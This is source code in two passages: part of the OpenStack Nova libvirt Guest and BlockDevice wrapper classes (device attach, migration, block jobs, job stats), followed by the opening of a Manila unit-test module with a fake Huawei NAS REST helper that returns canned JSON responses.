        from_persistent_config: bool = False
    ) -> ty.Optional[vconfig.LibvirtConfigGuestDevice]:
        """Lookup a full LibvirtConfigGuestDevice with
        a LibvirtConfigGuestDevice generated
        by nova.virt.libvirt.vif.get_config.
        :param cfg: config object that represents the guest interface.
        :param from_persistent_config: query the device from the persistent
            domain instead of the live domain configuration
        :returns: nova.virt.libvirt.config.LibvirtConfigGuestDevice instance
            if found, else None
        """
        if cfg:
            interfaces = self.get_all_devices(
                type(cfg), from_persistent_config)
            for interface in interfaces:
                # NOTE(leehom) LibvirtConfigGuest get from domain and
                # LibvirtConfigGuest generated by
                # nova.virt.libvirt.vif.get_config must be identical.
                # NOTE(gibi): LibvirtConfigGuest subtypes does a custom
                # equality check based on available information on nova side
                if cfg == interface:
                    return interface
        return None
    def get_vcpus_info(self):
        """Returns virtual cpus information of guest.
        :returns: guest.VCPUInfo
        """
        vcpus = self._domain.vcpus()
        # vcpus[0] is the per-vcpu info list; each entry is
        # (number, state, cpuTime, cpu) per the libvirt python binding.
        for vcpu in vcpus[0]:
            yield VCPUInfo(
                id=vcpu[0], cpu=vcpu[3], state=vcpu[1], time=vcpu[2])
    def delete_configuration(self, support_uefi=False):
        """Undefines a domain from hypervisor."""
        try:
            flags = libvirt.VIR_DOMAIN_UNDEFINE_MANAGED_SAVE
            if support_uefi:
                flags |= libvirt.VIR_DOMAIN_UNDEFINE_NVRAM
            self._domain.undefineFlags(flags)
        except libvirt.libvirtError:
            # Fall back to a plain undefine if the flags variant fails.
            LOG.debug("Error from libvirt during undefineFlags for guest "
                      "%d. Retrying with undefine", self.id)
            self._domain.undefine()
        except AttributeError:
            # Older versions of libvirt don't support undefine flags,
            # trying to remove managed image
            try:
                if self._domain.hasManagedSaveImage(0):
                    self._domain.managedSaveRemove(0)
            except AttributeError:
                pass
            self._domain.undefine()
    def has_persistent_configuration(self):
        """Whether domain config is persistently stored on the host."""
        return self._domain.isPersistent()
    def attach_device(self, conf, persistent=False, live=False):
        """Attaches device to the guest.
        :param conf: A LibvirtConfigObject of the device to attach
        :param persistent: A bool to indicate whether the change is
                           persistent or not
        :param live: A bool to indicate whether it affect the guest
                     in running state
        """
        # Translate the two booleans into libvirt affect flags.
        flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
        flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
        device_xml = conf.to_xml()
        if isinstance(device_xml, bytes):
            device_xml = device_xml.decode('utf-8')
        LOG.debug("attach device xml: %s", device_xml)
        self._domain.attachDeviceFlags(device_xml, flags=flags)
    def set_metadata(self, metadata, persistent=False, live=False):
        """Set metadata to the guest.
        Please note that this function completely replaces the existing
        metadata. The scope of the replacement is limited to the Nova-specific
        XML Namespace.
        :param metadata: A LibvirtConfigGuestMetaNovaInstance
        :param persistent: A bool to indicate whether the change is
                           persistent or not
        :param live: A bool to indicate whether it affect the guest
                     in running state
        """
        flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
        flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
        metadata_xml = metadata.to_xml()
        LOG.debug("set metadata xml: %s", metadata_xml)
        self._domain.setMetadata(libvirt.VIR_DOMAIN_METADATA_ELEMENT,
                                 metadata_xml, "instance",
                                 vconfig.NOVA_NS, flags=flags)
    def get_config(self):
        """Returns the config instance for a guest
        :returns: LibvirtConfigGuest instance
        """
        config = vconfig.LibvirtConfigGuest()
        config.parse_str(self._domain.XMLDesc(0))
        return config
    def get_disk(
        self,
        device: str,
        from_persistent_config: bool = False
    ) -> ty.Optional[vconfig.LibvirtConfigGuestDisk]:
        """Returns the disk mounted at device
        :param device: the name of either the source or the target device
        :param from_persistent_config: query the device from the persistent
            domain (i.e. inactive XML configuration that'll be used on next
            start of the domain) instead of the live domain configuration
        :returns LibvirtConfigGuestDisk: mounted at device or None
        """
        flags = 0
        if from_persistent_config:
            flags |= libvirt.VIR_DOMAIN_XML_INACTIVE
        try:
            doc = etree.fromstring(self._domain.XMLDesc(flags))
        except Exception:
            return None
        # FIXME(lyarwood): Workaround for the device being either a target dev
        # when called via swap_volume or source file when called via
        # live_snapshot. This should be removed once both are refactored to use
        # only the target dev of the device.
        node = doc.find("./devices/disk/target[@dev='%s'].." % device)
        if node is None:
            node = doc.find("./devices/disk/source[@file='%s'].." % device)
        if node is not None:
            conf = vconfig.LibvirtConfigGuestDisk()
            conf.parse_dom(node)
            return conf
        return None
    def get_all_disks(self):
        """Returns all the disks for a guest
        :returns: a list of LibvirtConfigGuestDisk instances
        """
        return self.get_all_devices(vconfig.LibvirtConfigGuestDisk)
    def get_all_devices(
        self,
        devtype: ty.Optional[ty.Type[vconfig.LibvirtConfigGuestDevice]] = None,
        from_persistent_config: bool = False
    ) -> ty.List[vconfig.LibvirtConfigGuestDevice]:
        """Returns all devices for a guest
        :param devtype: a LibvirtConfigGuestDevice subclass class
        :param from_persistent_config: query the device from the persistent
            domain (i.e. inactive XML configuration that'll be used on next
            start of the domain) instead of the live domain configuration
        :returns: a list of LibvirtConfigGuestDevice instances
        """
        flags = 0
        if from_persistent_config:
            flags |= libvirt.VIR_DOMAIN_XML_INACTIVE
        try:
            config = vconfig.LibvirtConfigGuest()
            config.parse_str(
                self._domain.XMLDesc(flags))
        except Exception:
            # Any failure to fetch/parse the XML is treated as "no devices".
            return []
        devs = []
        for dev in config.devices:
            if (devtype is None or
                    isinstance(dev, devtype)):
                devs.append(dev)
        return devs
    def detach_device(self, conf, persistent=False, live=False):
        """Detaches device to the guest.
        :param conf: A LibvirtConfigObject of the device to detach
        :param persistent: A bool to indicate whether the change is
                           persistent or not
        :param live: A bool to indicate whether it affect the guest
                     in running state
        """
        flags = persistent and libvirt.VIR_DOMAIN_AFFECT_CONFIG or 0
        flags |= live and libvirt.VIR_DOMAIN_AFFECT_LIVE or 0
        device_xml = conf.to_xml()
        if isinstance(device_xml, bytes):
            device_xml = device_xml.decode('utf-8')
        LOG.debug("detach device xml: %s", device_xml)
        self._domain.detachDeviceFlags(device_xml, flags=flags)
    def get_xml_desc(self, dump_inactive=False, dump_sensitive=False,
                     dump_migratable=False):
        """Returns xml description of guest.
        :param dump_inactive: Dump inactive domain information
        :param dump_sensitive: Dump security sensitive information
        :param dump_migratable: Dump XML suitable for migration
        :returns string: XML description of the guest
        """
        flags = dump_inactive and libvirt.VIR_DOMAIN_XML_INACTIVE or 0
        flags |= dump_sensitive and libvirt.VIR_DOMAIN_XML_SECURE or 0
        flags |= dump_migratable and libvirt.VIR_DOMAIN_XML_MIGRATABLE or 0
        return self._domain.XMLDesc(flags=flags)
    def save_memory_state(self):
        """Saves the domain's memory state. Requires running domain.
        raises: raises libvirtError on error
        """
        self._domain.managedSave(0)
    def get_block_device(self, disk):
        """Returns a block device wrapper for disk."""
        return BlockDevice(self, disk)
    def set_user_password(self, user, new_pass):
        """Configures a new user password."""
        self._domain.setUserPassword(user, new_pass, 0)
    def _get_domain_info(self):
        """Returns information on Guest.
        :returns list: [state, maxMem, memory, nrVirtCpu, cpuTime]
        """
        return self._domain.info()
    def get_info(self, host):
        """Retrieve information from libvirt for a specific instance name.
        If a libvirt error is encountered during lookup, we might raise a
        NotFound exception or Error exception depending on how severe the
        libvirt error is.
        :returns hardware.InstanceInfo:
        """
        try:
            dom_info = self._get_domain_info()
        except libvirt.libvirtError as ex:
            error_code = ex.get_error_code()
            if error_code == libvirt.VIR_ERR_NO_DOMAIN:
                raise exception.InstanceNotFound(instance_id=self.uuid)
            msg = (_('Error from libvirt while getting domain info for '
                     '%(instance_name)s: [Error Code %(error_code)s] %(ex)s') %
                   {'instance_name': self.name,
                    'error_code': error_code,
                    'ex': ex})
            raise exception.InternalError(msg)
        return hardware.InstanceInfo(
            state=LIBVIRT_POWER_STATE[dom_info[0]],
            internal_id=self.id)
    def get_power_state(self, host):
        # Convenience accessor for just the power state from get_info().
        return self.get_info(host).state
    def is_active(self):
        "Determines whether guest is currently running."
        return self._domain.isActive()
    def freeze_filesystems(self):
        """Freeze filesystems within guest."""
        self._domain.fsFreeze()
    def thaw_filesystems(self):
        """Thaw filesystems within guest."""
        self._domain.fsThaw()
    def snapshot(self, conf, no_metadata=False,
                 disk_only=False, reuse_ext=False, quiesce=False):
        """Creates a guest snapshot.
        :param conf: libvirt.LibvirtConfigGuestSnapshotDisk
        :param no_metadata: Make snapshot without remembering it
        :param disk_only: Disk snapshot, no system checkpoint
        :param reuse_ext: Reuse any existing external files
        :param quiesce: Use QGA to quiesce all mounted file systems
        """
        flags = no_metadata and (
            libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA or 0)
        flags |= disk_only and (
            libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY or 0)
        flags |= reuse_ext and (
            libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT or 0)
        flags |= quiesce and libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE or 0
        device_xml = conf.to_xml()
        if isinstance(device_xml, bytes):
            device_xml = device_xml.decode('utf-8')
        self._domain.snapshotCreateXML(device_xml, flags=flags)
    def shutdown(self):
        """Shutdown guest"""
        self._domain.shutdown()
    def pause(self):
        """Suspends an active guest
        Process is frozen without further access to CPU resources and
        I/O but the memory used by the domain at the hypervisor level
        will stay allocated.
        See method "resume()" to reactivate the guest.
        """
        self._domain.suspend()
    def migrate(self, destination, migrate_uri=None, migrate_disks=None,
                destination_xml=None, flags=0, bandwidth=0):
        """Migrate guest object from its current host to the destination
        :param destination: URI of host destination where guest will be
                            migrated
        :param migrate_uri: URI for invoking the migration
        :param migrate_disks: List of disks to be migrated
        :param destination_xml: The guest XML to be used on the target host
        :param flags: May be one of more of the following:
           VIR_MIGRATE_LIVE Do not pause the VM during migration
           VIR_MIGRATE_PEER2PEER Direct connection between source &
                                 destination hosts
           VIR_MIGRATE_TUNNELLED Tunnel migration data over the
                                 libvirt RPC channel
           VIR_MIGRATE_PERSIST_DEST If the migration is successful,
                                    persist the domain on the
                                    destination host.
           VIR_MIGRATE_UNDEFINE_SOURCE If the migration is successful,
                                       undefine the domain on the
                                       source host.
           VIR_MIGRATE_NON_SHARED_INC Migration with non-shared
                                      storage with incremental disk
                                      copy
           VIR_MIGRATE_AUTO_CONVERGE Slow down domain to make sure it does
                                     not change its memory faster than a
                                     hypervisor can transfer the changed
                                     memory to the destination host
           VIR_MIGRATE_POSTCOPY Tell libvirt to enable post-copy migration
           VIR_MIGRATE_TLS Use QEMU-native TLS
        :param bandwidth: The maximum bandwidth in MiB/s
        """
        params = {}
        # In migrateToURI3 these parameters are extracted from the
        # `params` dict
        params['bandwidth'] = bandwidth
        if destination_xml:
            params['destination_xml'] = destination_xml
            params['persistent_xml'] = destination_xml
        if migrate_disks:
            params['migrate_disks'] = migrate_disks
        if migrate_uri:
            params['migrate_uri'] = migrate_uri
        # Due to a quirk in the libvirt python bindings,
        # VIR_MIGRATE_NON_SHARED_INC with an empty migrate_disks is
        # interpreted as "block migrate all writable disks" rather than
        # "don't block migrate any disks". This includes attached
        # volumes, which will potentially corrupt data on those
        # volumes. Consequently we need to explicitly unset
        # VIR_MIGRATE_NON_SHARED_INC if there are no disks to be block
        # migrated.
        if (flags & libvirt.VIR_MIGRATE_NON_SHARED_INC != 0 and
                not params.get('migrate_disks')):
            flags &= ~libvirt.VIR_MIGRATE_NON_SHARED_INC
        self._domain.migrateToURI3(
            destination, params=params, flags=flags)
    def abort_job(self):
        """Requests to abort current background job"""
        self._domain.abortJob()
    def migrate_configure_max_downtime(self, mstime):
        """Sets maximum time for which domain is allowed to be paused
        :param mstime: Downtime in milliseconds.
        """
        self._domain.migrateSetMaxDowntime(mstime)
    def migrate_start_postcopy(self):
        """Switch running live migration to post-copy mode"""
        self._domain.migrateStartPostCopy()
    def announce_self(self):
        # Ask QEMU (via the monitor) to re-announce the guest's network
        # presence, e.g. so switches learn its MAC after migration.
        libvirtmod_qemu.virDomainQemuMonitorCommand(
            self._domain._o, 'announce_self', 1)
    def get_job_info(self):
        """Get job info for the domain
        Query the libvirt job info for the domain (ie progress
        of migration, or snapshot operation)
        :returns: a JobInfo of guest
        """
        if JobInfo._have_job_stats:
            try:
                stats = self._domain.jobStats()
                return JobInfo(**stats)
            except libvirt.libvirtError as ex:
                if ex.get_error_code() == libvirt.VIR_ERR_NO_SUPPORT:
                    # Remote libvirt doesn't support new API
                    LOG.debug("Missing remote virDomainGetJobStats: %s", ex)
                    JobInfo._have_job_stats = False
                    return JobInfo._get_job_stats_compat(self._domain)
                elif ex.get_error_code() in (
                        libvirt.VIR_ERR_NO_DOMAIN,
                        libvirt.VIR_ERR_OPERATION_INVALID):
                    # Transient guest finished migration, so it has gone
                    # away completely
                    LOG.debug("Domain has shutdown/gone away: %s", ex)
                    return JobInfo(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
                else:
                    LOG.debug("Failed to get job stats: %s", ex)
                    raise
            except AttributeError as ex:
                # Local python binding doesn't support new API
                LOG.debug("Missing local virDomainGetJobStats: %s", ex)
                JobInfo._have_job_stats = False
                return JobInfo._get_job_stats_compat(self._domain)
        else:
            return JobInfo._get_job_stats_compat(self._domain)
class BlockDevice(object):
    """Wrapper around block device API"""
    # Bandwidth limits for rebase/commit jobs, in MiB/s; 0 means unlimited.
    REBASE_DEFAULT_BANDWIDTH = 0  # in MiB/s - 0 unlimited
    COMMIT_DEFAULT_BANDWIDTH = 0  # in MiB/s - 0 unlimited
    def __init__(self, guest, disk):
        # guest: the owning Guest wrapper; disk: target dev or source path.
        self._guest = guest
        self._disk = disk
    def abort_job(self, async_=False, pivot=False):
        """Request to cancel a live block device job
        :param async_: Cancel the block device job (e.g. 'copy' or
                       'commit'), and return as soon as possible, without
                       waiting for job completion
        :param pivot: Pivot to the destination image when ending a
                      'copy' or "active commit" (meaning: merging the
                      contents of current active disk into its backing
                      file) job
        """
        flags = async_ and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_ASYNC or 0
        flags |= pivot and libvirt.VIR_DOMAIN_BLOCK_JOB_ABORT_PIVOT or 0
        self._guest._domain.blockJobAbort(self._disk, flags=flags)
    def get_job_info(self):
        """Returns information about job currently running
        :returns: BlockDeviceJobInfo, or None if no job exists
        :raises: libvirt.libvirtError on error fetching block job info
        """
        # libvirt's blockJobInfo() raises libvirt.libvirtError if there was an
        # error. It returns {} if the job no longer exists, or a fully
        # populated dict if the job exists.
        status = self._guest._domain.blockJobInfo(self._disk, flags=0)
        # The job no longer exists
        if not status:
            return None
        return BlockDeviceJobInfo(
            job=status['type'],
            bandwidth=status['bandwidth'],
            cur=status['cur'],
            end=status['end'])
    def copy(self, dest_xml, shallow=False, reuse_ext=False, transient=False):
        """Copy the guest-visible contents into a new disk
        http://libvirt.org/html/libvirt-libvirt-domain.html#virDomainBlockCopy
        :param: dest_xml: XML describing the destination disk to copy to
        :param: shallow: Limit copy to top of source backing chain
        :param: reuse_ext: Reuse existing external file for a copy
        :param: transient: Don't force usage of recoverable job for the copy
                           operation
        """
        flags = shallow and libvirt.VIR_DOMAIN_BLOCK_COPY_SHALLOW or 0
        flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_COPY_REUSE_EXT or 0
        flags |= transient and libvirt.VIR_DOMAIN_BLOCK_COPY_TRANSIENT_JOB or 0
        return self._guest._domain.blockCopy(self._disk, dest_xml, flags=flags)
    def rebase(self, base, shallow=False, reuse_ext=False,
               copy=False, relative=False, copy_dev=False):
        """Copy data from backing chain into a new disk
        This copies data from backing file(s) into overlay(s), giving
        control over several aspects like what part of a disk image
        chain to be copied, whether to reuse an existing destination
        file, etc.  And updates the backing file to the new disk
        :param shallow: Limit copy to top of the source backing chain
        :param reuse_ext: Reuse an existing external file that was
                          pre-created
        :param copy: Start a copy job
        :param relative: Keep backing chain referenced using relative names
        :param copy_dev: Treat the destination as type="block"
        """
        flags = shallow and libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW or 0
        flags |= reuse_ext and libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT or 0
        flags |= copy and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY or 0
        flags |= copy_dev and libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY_DEV or 0
        flags |= relative and libvirt.VIR_DOMAIN_BLOCK_REBASE_RELATIVE or 0
        return self._guest._domain.blockRebase(
            self._disk, base, self.REBASE_DEFAULT_BANDWIDTH, flags=flags)
    def commit(self, base, top, relative=False):
        """Merge data from overlays into backing file
        This live merges (or "commits") contents from backing files into
        overlays, thus reducing the length of a disk image chain.
        :param relative: Keep backing chain referenced using relative names
        """
        flags = relative and libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE or 0
        return self._guest._domain.blockCommit(
            self._disk, base, top, self.COMMIT_DEFAULT_BANDWIDTH, flags=flags)
    def resize(self, size):
        """Resize block device to the given size in bytes.
        This resizes the block device within the instance to the given size.
        :param size: The size to resize the device to in bytes.
        """
        flags = libvirt.VIR_DOMAIN_BLOCK_RESIZE_BYTES
        self._guest._domain.blockResize(self._disk, size, flags=flags)
    def is_job_complete(self):
        """Return True if the job is complete, False otherwise
        :returns: True if the job is complete, False otherwise
        :raises: libvirt.libvirtError on error fetching block job info
        """
        # NOTE(mdbooth): This method polls for block job completion. It returns
        # true if either we get a status which indicates completion, or there
        # is no longer a record of the job. Ideally this method and its
        # callers would be rewritten to consume libvirt events from the job.
        # This would provide a couple of advantages. Firstly, as it would no
        # longer be polling it would notice completion immediately rather than
        # at the next 0.5s check, and would also consume fewer resources.
        # Secondly, with the current method we only know that 'no job'
        # indicates completion. It does not necessarily indicate successful
        # completion: the job could have failed, or been cancelled. When
        # polling for block job info we have no way to detect this, so we
        # assume success.
        status = self.get_job_info()
        # If the job no longer exists, it is because it has completed
        # NOTE(mdbooth): See comment above: it may not have succeeded.
        if status is None:
            return True
        # Track blockjob progress in DEBUG, helpful when reviewing failures.
        job_type = LIBVIRT_BLOCK_JOB_TYPE.get(
            status.job, f"Unknown to Nova ({status.job})")
        LOG.debug("%(job_type)s block job progress, current cursor: %(cur)s "
                  "final cursor: %(end)s",
                  {'job_type': job_type, 'cur': status.cur, 'end': status.end})
        # NOTE(lyarwood): Use the mirror element to determine if we can pivot
        # to the new disk once blockjobinfo reports progress as complete.
        if status.cur == status.end:
            disk = self._guest.get_disk(self._disk)
            if disk and disk.mirror:
                return disk.mirror.ready == 'yes'
        return False
    def blockStats(self):
        """Extracts block device statistics for a domain"""
        return self._guest._domain.blockStats(self._disk)
class VCPUInfo(object):
    """Passive record describing a single guest virtual cpu."""

    def __init__(self, id, cpu, state, time):
        """Capture the details of one vcpu.

        :param id: The virtual cpu number
        :param cpu: The host cpu currently associated
        :param state: The running state of the vcpu (0 offline, 1 running, 2
                      blocked on resource)
        :param time: The cpu time used in nanoseconds
        """
        # Plain data holder: stash the four fields and nothing else.
        self.id, self.cpu, self.state, self.time = id, cpu, state, time
class BlockDeviceJobInfo(object):
    """Passive record describing a running block device job."""

    def __init__(self, job, bandwidth, cur, end):
        """Capture the details of one block job.

        :param job: The running job (0 placeholder, 1 pull,
                    2 copy, 3 commit, 4 active commit)
        :param bandwidth: Used in MiB/s
        :param cur: Indicates the position between 0 and 'end'
        :param end: Indicates the position for this operation
        """
        # Plain data holder: stash the four fields and nothing else.
        self.job, self.bandwidth = job, bandwidth
        self.cur, self.end = cur, end
class JobInfo(object):
    """Information about libvirt background jobs

    This class encapsulates information about libvirt
    background jobs. It provides a mapping from either
    the old virDomainGetJobInfo API which returned a
    fixed list of fields, or the modern virDomainGetJobStats
    which returns an extendable dict of fields.
    """

    _have_job_stats = True

    # (attribute name, kwargs key) pairs; every counter defaults to 0.
    # The "compression_*" keys are deliberately shortened to comp_*
    # attribute names.
    _FIELDS = (
        ("time_elapsed", "time_elapsed"),
        ("time_remaining", "time_remaining"),
        ("downtime", "downtime"),
        ("setup_time", "setup_time"),
        ("data_total", "data_total"),
        ("data_processed", "data_processed"),
        ("data_remaining", "data_remaining"),
        ("memory_total", "memory_total"),
        ("memory_processed", "memory_processed"),
        ("memory_remaining", "memory_remaining"),
        ("memory_iteration", "memory_iteration"),
        ("memory_constant", "memory_constant"),
        ("memory_normal", "memory_normal"),
        ("memory_normal_bytes", "memory_normal_bytes"),
        ("memory_bps", "memory_bps"),
        ("disk_total", "disk_total"),
        ("disk_processed", "disk_processed"),
        ("disk_remaining", "disk_remaining"),
        ("disk_bps", "disk_bps"),
        ("comp_cache", "compression_cache"),
        ("comp_bytes", "compression_bytes"),
        ("comp_pages", "compression_pages"),
        ("comp_cache_misses", "compression_cache_misses"),
        ("comp_overflow", "compression_overflow"),
    )

    def __init__(self, **kwargs):
        # 'type' is the only field whose default is not zero.
        self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
        for attr, key in self._FIELDS:
            setattr(self, attr, kwargs.get(key, 0))

    @classmethod
    def _get_job_stats_compat(cls, dom):
        # Make the old virDomainGetJobInfo method look similar to the
        # modern virDomainGetJobStats method
        try:
            info = dom.jobInfo()
        except libvirt.libvirtError as ex:
            # When migration of a transient guest completes, the guest
            # goes away so we'll see NO_DOMAIN error code
            #
            # When migration of a persistent guest completes, the guest
            # merely shuts off, but libvirt unhelpfully raises an
            # OPERATION_INVALID error code
            #
            # Lets pretend both of these mean success
            success_codes = (libvirt.VIR_ERR_NO_DOMAIN,
                             libvirt.VIR_ERR_OPERATION_INVALID)
            if ex.get_error_code() in success_codes:
                LOG.debug("Domain has shutdown/gone away: %s", ex)
                return cls(type=libvirt.VIR_DOMAIN_JOB_COMPLETED)
            LOG.debug("Failed to get job info: %s", ex)
            raise
        # virDomainGetJobInfo returns a fixed 12-element list; map it in
        # order onto the keyword names virDomainGetJobStats would use.
        keys = ("type", "time_elapsed", "time_remaining", "data_total",
                "data_processed", "data_remaining", "memory_total",
                "memory_processed", "memory_remaining", "disk_total",
                "disk_processed", "disk_remaining")
        return cls(**dict(zip(keys, info)))
|
|
# Copyright (c) 2014 Huawei Technologies Co., Ltd.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the Huawei nas driver module."""
import os
import shutil
import tempfile
import time
import xml.dom.minidom
import ddt
import mock
from oslo_serialization import jsonutils
from manila import context
from manila import exception
from manila.share import configuration as conf
from manila.share.drivers.huawei import huawei_nas
from manila.share.drivers.huawei.v3 import connection
from manila.share.drivers.huawei.v3 import helper
from manila import test
def fake_sleep(time):
    """No-op replacement for time.sleep() so the tests never block."""
    return None
def data_session(url):
    """Canned login/session JSON responses for the fake REST helper."""
    if url == "/xx/sessions":
        resp = """{"error":{"code":0},
                   "data":{"username":"admin",
                   "iBaseToken":"2001031430",
                   "deviceid":"210235G7J20000000000"}}"""
    elif url == "sessions":
        resp = '{"error":{"code":0},"data":{"ID":11}}'
    # NOTE: any other URL raises UnboundLocalError here; the fake is only
    # ever called with the two session endpoints above.
    return resp
def filesystem(method, data, fs_status_flag):
    """Canned responses for the filesystem resource.

    Returns a (response, extend_share_flag) tuple; the flag reports
    whether the request looked like a capacity-extension PUT.
    """
    extend_share_flag = False
    if method == "PUT":
        # Only the exact extend-capacity payload is recognised; any other
        # PUT body is echoed back unchanged.
        if data == """{"CAPACITY": 8388608}""":
            data = """{"error":{"code":0},
                       "data":{"ID":"4",
                       "CAPACITY":"8388608"}}"""
            extend_share_flag = True
    elif method == "DELETE":
        data = """{"error":{"code":0}}"""
    elif method == "GET":
        # Healthy vs unhealthy filesystem, selected by the caller's flag.
        if fs_status_flag:
            data = """{"error":{"code":0},
                       "data":{"HEALTHSTATUS":"1",
                       "RUNNINGSTATUS":"27",
                       "PARENTNAME":"OpenStack_Pool"}}"""
        else:
            data = """{"error":{"code":0},
                       "data":{"HEALTHSTATUS":"0",
                       "RUNNINGSTATUS":"27",
                       "PARENTNAME":"OpenStack_Pool"}}"""
    else:
        data = '{"error":{"code":31755596}}'
    return (data, extend_share_flag)
def allow_access(type, method, data):
    """Fake access-rule POST handler.

    Returns the canned response plus flags telling the caller whether a
    read-only or read-write rule payload was matched.
    """
    allow_ro_flag = False
    allow_rw_flag = False

    # Expected NFS payloads: serialise the ro variant first, then mutate
    # the dict in place to produce the rw variant.
    access_nfs = {
        "TYPE": "16409",
        "NAME": "1.2.3.4",
        "PARENTID": "1",
        "ACCESSVAL": "0",
        "SYNC": "0",
        "ALLSQUASH": "1",
        "ROOTSQUASH": "0",
    }
    access_nfs_ro_data = jsonutils.dumps(access_nfs)
    access_nfs["NAME"] = "100.112.0.1"
    access_nfs["ACCESSVAL"] = "1"
    access_nfs_rw_data = jsonutils.dumps(access_nfs)

    # Expected CIFS payloads, built the same way.
    access_cifs = {
        "NAME": "user_name",
        "PARENTID": "2",
        "PERMISSION": "0",
        "DOMAINTYPE": "2",
    }
    access_cifs_ro_data = jsonutils.dumps(access_cifs)
    access_cifs["PERMISSION"] = "5"
    access_cifs_rw_data = jsonutils.dumps(access_cifs)

    # Anything but POST is rejected outright.  NOTE: this path returns a
    # bare string, not the (data, ro, rw) tuple.
    if method != "POST":
        return """{"error":{"code":31755596}}"""

    ro_match = ((type == "NFS" and data == access_nfs_ro_data)
                or (type == "CIFS" and data == access_cifs_ro_data))
    rw_match = ((type == 'NFS' and data == access_nfs_rw_data)
                or (type == 'CIFS' and data == access_cifs_rw_data))
    if ro_match:
        allow_ro_flag = True
        data = """{"error":{"code":0}}"""
    elif rw_match:
        allow_rw_flag = True
        data = """{"error":{"code":0}}"""
    else:
        data = """{"error":{"code":31755596}}"""
    return (data, allow_ro_flag, allow_rw_flag)
class FakeHuaweiNasHelper(helper.RestHelper):
    """Fake RestHelper that answers canned JSON per URL.

    Instead of talking to a real Huawei V3 array, ``do_call`` matches the
    (normalised) URL against known endpoints and returns a hard-coded
    response.  The boolean attributes both record which fake operations
    were exercised (asserted on by tests) and let tests select failure
    responses in advance.
    """

    def __init__(self, *args, **kwargs):
        helper.RestHelper.__init__(self, *args, **kwargs)
        # When False, every call answers with a generic error response.
        self.test_normal = True
        self.deviceid = None
        # Flags set as a side effect of do_call(), read back by tests.
        self.delete_flag = False
        self.allow_flag = False
        self.deny_flag = False
        self.create_snapflag = False
        self.setupserver_flag = False
        # Flags toggled by tests beforehand to steer the canned responses.
        self.fs_status_flag = True
        self.create_share_flag = False
        self.snapshot_flag = True
        self.service_status_flag = True
        self.share_exist = True
        self.service_nfs_status_flag = True
        self.create_share_data_flag = False
        self.allow_ro_flag = False
        self.allow_rw_flag = False
        self.extend_share_flag = False
        # 0: single URL; 1: every URL fails; 2: primary fails, fallback OK.
        self.test_multi_url_flag = 0

    def _change_file_mode(self, filepath):
        # No-op: avoid touching real file permissions during tests.
        pass

    def do_call(self, url, data=None, method=None):
        """Return a canned JSON response for the given fake REST call."""
        # Strip the primary controller prefix and device id from the URL.
        url = url.replace('http://100.115.10.69:8082/deviceManager/rest', '')
        url = url.replace('/210235G7J20000000000/', '')
        if self.test_normal:
            # Multi-URL failover simulation (see test_multi_url_flag above).
            if self.test_multi_url_flag == 1:
                data = '{"error":{"code":-403}}'
                res_json = jsonutils.loads(data)
                return res_json
            elif self.test_multi_url_flag == 2:
                if 'http://100.115.10.70:8082/deviceManager/rest' in url:
                    url = url.replace('http://100.115.10.70:8082/'
                                      'deviceManager/rest', '')
                else:
                    data = '{"error":{"code":-403}}'
                    res_json = jsonutils.loads(data)
                    return res_json
            # Session / login endpoints.
            if url == "/xx/sessions" or url == "sessions":
                data = data_session(url)
            if url == "storagepool":
                data = """{"error":{"code":0},
                    "data":[{"USERFREECAPACITY":"2097152",
                    "ID":"1",
                    "NAME":"OpenStack_Pool",
                    "USERTOTALCAPACITY":"4194304",
                    "USAGETYPE":"2",
                    "USERCONSUMEDCAPACITY":"2097152"}]}"""
            if url == "filesystem":
                data = """{"error":{"code":0},"data":{
                    "ID":"4"}}"""
            # Share creation endpoints.
            if url == "NFSHARE" or url == "CIFSHARE":
                if self.create_share_flag:
                    data = '{"error":{"code":31755596}}'
                elif self.create_share_data_flag:
                    data = '{"error":{"code":0}}'
                else:
                    data = """{"error":{"code":0},"data":{
                        "ID":"10"}}"""
            # Share listing; share_exist selects a matching or missing FS.
            if url == "NFSHARE?range=[100-200]":
                if self.share_exist:
                    data = """{"error":{"code":0},
                        "data":[{"ID":"1",
                        "FSID":"4",
                        "NAME":"test",
                        "SHAREPATH":"/share_fake_uuid/"}]}"""
                else:
                    data = """{"error":{"code":0},
                        "data":[{"ID":"1",
                        "FSID":"",
                        "NAME":"test",
                        "SHAREPATH":"/share_fake_uuid_fail/"}]}"""
            if url == "CIFSHARE?range=[100-200]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"2",
                    "FSID":"4",
                    "NAME":"test",
                    "SHAREPATH":"/share_fake_uuid/"}]}"""
            if url == "NFSHARE?range=[0-100]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"1",
                    "FSID":"4",
                    "NAME":"test_fail",
                    "SHAREPATH":"/share_fake_uuid_fail/"}]}"""
            if url == "CIFSHARE?range=[0-100]":
                data = """{"error":{"code":0},
                    "data":[{"ID":"2",
                    "FSID":"4",
                    "NAME":"test_fail",
                    "SHAREPATH":"/share_fake_uuid_fail/"}]}"""
            # Share deletion.
            if url == "NFSHARE/1" or url == "CIFSHARE/2":
                data = """{"error":{"code":0}}"""
